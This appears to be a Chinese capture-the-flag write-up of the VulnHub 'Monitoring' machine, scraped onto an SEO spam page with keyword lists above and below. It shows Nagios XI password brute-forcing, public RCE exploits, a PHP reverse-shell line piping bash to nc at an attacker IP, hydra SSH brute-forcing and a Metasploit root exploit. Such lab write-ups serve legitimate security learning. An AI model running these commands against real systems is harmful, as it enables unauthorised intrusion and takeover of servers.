国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁(yè) > news >正文

前端怎么做電商網(wǎng)站網(wǎng)絡(luò)營(yíng)銷(xiāo)和網(wǎng)絡(luò)銷(xiāo)售的關(guān)系

前端怎么做電商網(wǎng)站,網(wǎng)絡(luò)營(yíng)銷(xiāo)和網(wǎng)絡(luò)銷(xiāo)售的關(guān)系,公司做網(wǎng)站需要,網(wǎng)站建設(shè)外包文章目錄 1. 主機(jī)發(fā)現(xiàn)2. 端口掃描3. 服務(wù)枚舉4. 服務(wù)探查4.1 ssh服務(wù)4.2 smtp服務(wù)4.3 http/https服務(wù) 5. 系統(tǒng)提權(quán)5.1 枚舉系統(tǒng)信息5.2 枚舉passwd文件5.3 枚舉定時(shí)任務(wù)5.4 linpeas提權(quán) 6. 獲取flag 靶機(jī)地址:https://download.vulnhub.com/monitoring/Monitoring.o…

文章目錄

  • 1. 主機(jī)發(fā)現(xiàn)
  • 2. 端口掃描
  • 3. 服務(wù)枚舉
  • 4. 服務(wù)探查
    • 4.1 ssh服務(wù)
    • 4.2 smtp服務(wù)
    • 4.3 http/https服務(wù)
  • 5. 系統(tǒng)提權(quán)
    • 5.1 枚舉系統(tǒng)信息
    • 5.2 枚舉passwd文件
    • 5.3 枚舉定時(shí)任務(wù)
    • 5.4 linpeas提權(quán)
  • 6. 獲取flag

靶機(jī)地址:https://download.vulnhub.com/monitoring/Monitoring.ova


1. 主機(jī)發(fā)現(xiàn)

目前只知道目標(biāo)靶機(jī)在192.xx網(wǎng)段,通過(guò)如下的命令,看看這個(gè)網(wǎng)段上在線的主機(jī)。

$ nmap -sP 192.168.192.0/24

在這里插入圖片描述

鎖定靶機(jī)IP地址為192.168.192.132.

2. 端口掃描

針對(duì)目標(biāo)靶機(jī)進(jìn)行端口掃描。

$ sudo nmap -p- 192.168.192.132

在這里插入圖片描述

3. 服務(wù)枚舉

通過(guò)下面的命令掃描一下目標(biāo)靶機(jī)開(kāi)放端口上運(yùn)行的服務(wù)。

$ sudo nmap -A -p22,25,80,389,443,5667 -sV -sT 192.168.192.132

在這里插入圖片描述

4. 服務(wù)探查

服務(wù)不多,逐個(gè)試試看。

4.1 ssh服務(wù)

先試試22端口上的ssh服務(wù)。

$ ssh root@192.168.192.132

在這里插入圖片描述

試了一下,可以訪問(wèn),這為后面的爆破提供了可能。

4.2 smtp服務(wù)

試試25端口上的smtp服務(wù)。

$ telnet 192.168.192.132 25

在這里插入圖片描述
這個(gè)端口可以用,不過(guò)還不太會(huì),上網(wǎng)搜索一番。

$ nc 192.168.192.132 25

在這里插入圖片描述
返回250說(shuō)明響應(yīng)成功,使用EHLO可以查看支持的各種擴(kuò)展列表。

EHLO 192.168.192.132

在這里插入圖片描述
再進(jìn)一步試一下。
在這里插入圖片描述
嗯,看來(lái)是可以用的,并且存在一個(gè)root@localhost的郵箱,根據(jù)后面探查的結(jié)果再回來(lái)看。

4.3 http/https服務(wù)

直接用瀏覽器訪問(wèn)一下。
在這里插入圖片描述
可以訪問(wèn),不過(guò)不知道Nagios是個(gè)啥玩意兒,搜索了一下,貌似是一個(gè)在線監(jiān)控的工具。仔細(xì)瀏覽一下看看,發(fā)現(xiàn)有登錄頁(yè)面,如下圖。
在這里插入圖片描述
隨便輸入登錄一下試試。
在這里插入圖片描述
貌似沒(méi)法枚舉賬號(hào),嘗試忘記密碼試試看。
在這里插入圖片描述
額,貌似跟郵件系統(tǒng)有了關(guān)聯(lián)。可惜一頓折騰也沒(méi)有搞定郵件系統(tǒng)。還是返回來(lái)進(jìn)行目錄枚舉一下。

$ dirsearch -u http://192.168.192.132:80/

在這里插入圖片描述
沒(méi)發(fā)現(xiàn)有用的內(nèi)容,還是嘗試爆破一下root賬號(hào)試試看,結(jié)果也失敗了。還是上網(wǎng)看看有什么有用的信息吧。再官網(wǎng)上找到了一個(gè)安裝指南(https://assets.nagios.com/downloads/nagiosxi/docs/installation-manual-of-Nagios-XI-2024.pdf),這里面默認(rèn)用了一個(gè)nagiosadmin的管理員賬號(hào),如下圖。
在這里插入圖片描述
嘗試用rockyou爆破一下這個(gè)賬號(hào)試試。
在這里插入圖片描述
最后爆破出來(lái)的nagiosadmin用戶的密碼是admin,手工登錄看看。
在這里插入圖片描述
登錄成功,版本為Nagios XI 5.6.0。直接searchsploit搜索一下這個(gè)版本上有啥可以利用的漏洞。

$ searchsploit “Nagios XI”

在這里插入圖片描述
貌似可以利用的EXP還不少,我們倒著看編號(hào)為49422的RCE漏洞。
首先再kali上4444端口建立監(jiān)聽(tīng)。

$ nc -lvnp 4444

然后按照腳本提示,直接執(zhí)行EXP。

$ python3 49422.py http://192.168.192.132 nagiosadmin admin 192.168.192.129 4444

在這里插入圖片描述
順利突破了邊界,獲得了反彈shell,如下圖所示。
在這里插入圖片描述

5. 系統(tǒng)提權(quán)

先優(yōu)化一下shell。

www-data@ubuntu:/usr/local/nagiosxi/html/admin$ whereis python
www-data@ubuntu:/usr/local/nagiosxi/html/admin$ /usr/bin/python3.5 -c "import  pty; pty.spawn('/bin/bash')"

5.1 枚舉系統(tǒng)信息

$ uname -a
$ cat /etc/*-release

是64位的ubuntu 16.04。
在這里插入圖片描述

5.2 枚舉passwd文件

$ cat /etc/passwd | grep -v nologin

在這里插入圖片描述
正常的shell用戶也不多。

5.3 枚舉定時(shí)任務(wù)

枚舉一下定時(shí)任務(wù)試試看。
在這里插入圖片描述
沒(méi)有合適的。

5.4 linpeas提權(quán)

直接使用linpeas提取。

$ chmod u+x linpeas.sh
$ sh linpeas.sh

下圖所示的三個(gè)EXP是非常有可能的。
在這里插入圖片描述

我們逐個(gè)試一下。

$ searchsploit -m 45010

然后在ubuntu 16.04上面編譯一下。

$ gcc 45010.c -o 45010

然后上傳到靶機(jī)的/tmp目錄下執(zhí)行一下試試看。

$ chmod u+x 45010
$ ./45010

在這里插入圖片描述
提權(quán)失敗,再試試第二個(gè)。
在這里插入圖片描述
第二個(gè)直接卡住了,再試試第三個(gè)。
在這里插入圖片描述
第三個(gè)也是沒(méi)啥動(dòng)靜,宣告失敗。
接著往下看,在sudo -l下面,有比較多有意思的內(nèi)容,如下圖所示。
在這里插入圖片描述
看不太懂,不太會(huì)用,上網(wǎng)搜索下,發(fā)現(xiàn)有篇文章對(duì)(https://www.tenable.com/security/research/tra-2020-61)這個(gè)有一些總結(jié)性說(shuō)明?,F(xiàn)在嘗試一下。

$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
$ echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg
$ echo -e "\x3c\x3fphp system('/bin/bash -i 2>&1 | nc 192.168.192.129 5555'); \x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php test

可惜的是,監(jiān)聽(tīng)一直反彈成功。從好多的現(xiàn)象來(lái)看,nagios用戶的權(quán)限貌似比www-data要高,想辦法切換到nagios用戶試試看,直接用hydra爆破一下。

$ hydra -l nagios -P ../../rockyou.txt -vV -e ns 192.168.192.132 ssh

在這里插入圖片描述
半天也沒(méi)有結(jié)果,看來(lái)得想其它辦法了。利用神器metasploit試試看。

$ msfconsole
msf6 > search nagios

在這里插入圖片描述
看不太懂,不管了把Rank為Excellent并且Check為Yes的都試一下。
最后發(fā)現(xiàn)行號(hào)為19的EXP可以成功,如下所示。

msf6 > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.192.132
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.192.129
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

在這里插入圖片描述
直接進(jìn)來(lái)就是root權(quán)限,這個(gè)EXP比較牛逼。

6. 獲取flag

在這里插入圖片描述
成功獲得flag,本次打靶到此結(jié)束。

http://m.aloenet.com.cn/news/33439.html

相關(guān)文章:

  • 做論壇網(wǎng)站需要哪些前置審批申請(qǐng)一個(gè)網(wǎng)站需要多少錢(qián)
  • 網(wǎng)站域名備案需要資料網(wǎng)站內(nèi)鏈優(yōu)化
  • 專(zhuān)業(yè)的營(yíng)銷(xiāo)型網(wǎng)站最新報(bào)價(jià)網(wǎng)絡(luò)推廣策劃
  • 怎么給網(wǎng)站做aapseo優(yōu)化專(zhuān)家
  • 廈網(wǎng)站建設(shè)培訓(xùn)學(xué)校創(chuàng)建網(wǎng)站要錢(qián)嗎
  • 做外貿(mào)網(wǎng)站需要什么卡西安網(wǎng)站快速排名提升
  • 外貿(mào)需要網(wǎng)站做生產(chǎn)車(chē)間展示友聯(lián)互換
  • 網(wǎng)站規(guī)劃與設(shè)計(jì)范文seo招聘網(wǎng)
  • 什么樣建網(wǎng)站百度的seo排名怎么刷
  • 建站之星怎么用國(guó)外網(wǎng)站搭建
  • 網(wǎng)站 css江門(mén)百度seo公司
  • 東莞市建設(shè)網(wǎng)站首頁(yè)百度怎樣發(fā)布作品
  • app開(kāi)發(fā)及后期維護(hù)費(fèi)用重慶企業(yè)站seo
  • 陜西省建設(shè)廳網(wǎng)站三類(lèi)b證磁力蜘蛛
  • 怎么做網(wǎng)絡(luò)推廣營(yíng)銷(xiāo)seo專(zhuān)員的工作內(nèi)容
  • 商務(wù)網(wǎng)站建設(shè)實(shí)訓(xùn)報(bào)告網(wǎng)絡(luò)銷(xiāo)售面試問(wèn)題有哪些
  • 男人互做網(wǎng)站關(guān)鍵詞排名靠前
  • 金華建設(shè)學(xué)校繼續(xù)教育網(wǎng)站廣東培訓(xùn)seo
  • 企業(yè)模擬網(wǎng)站建設(shè)本地推廣平臺(tái)有哪些
  • 大型電子商務(wù)網(wǎng)站開(kāi)發(fā)架構(gòu)技能培訓(xùn)學(xué)校
  • python開(kāi)發(fā)手機(jī)網(wǎng)站開(kāi)發(fā)湖南網(wǎng)站營(yíng)銷(xiāo)推廣
  • 蘭州網(wǎng)站建設(shè)招聘b2b電子商務(wù)網(wǎng)站
  • 怎么做租房網(wǎng)站營(yíng)銷(xiāo)失敗案例分析
  • 定制開(kāi)發(fā)電商網(wǎng)站建設(shè)百度seo和sem的區(qū)別
  • 菏澤正耀網(wǎng)站建設(shè)公司怎么樣長(zhǎng)沙網(wǎng)站優(yōu)化價(jià)格
  • 集團(tuán)企業(yè)網(wǎng)站建設(shè)屬于seo網(wǎng)站優(yōu)化
  • 最早做視頻播放網(wǎng)站百度排名優(yōu)化軟件
  • 房屋結(jié)構(gòu)自建設(shè)計(jì) 網(wǎng)站app開(kāi)發(fā)網(wǎng)站
  • 免費(fèi)空間asp網(wǎng)站seo基礎(chǔ)入門(mén)
  • 長(zhǎng)沙房地產(chǎn)交易網(wǎng)seo搜索引擎優(yōu)化工具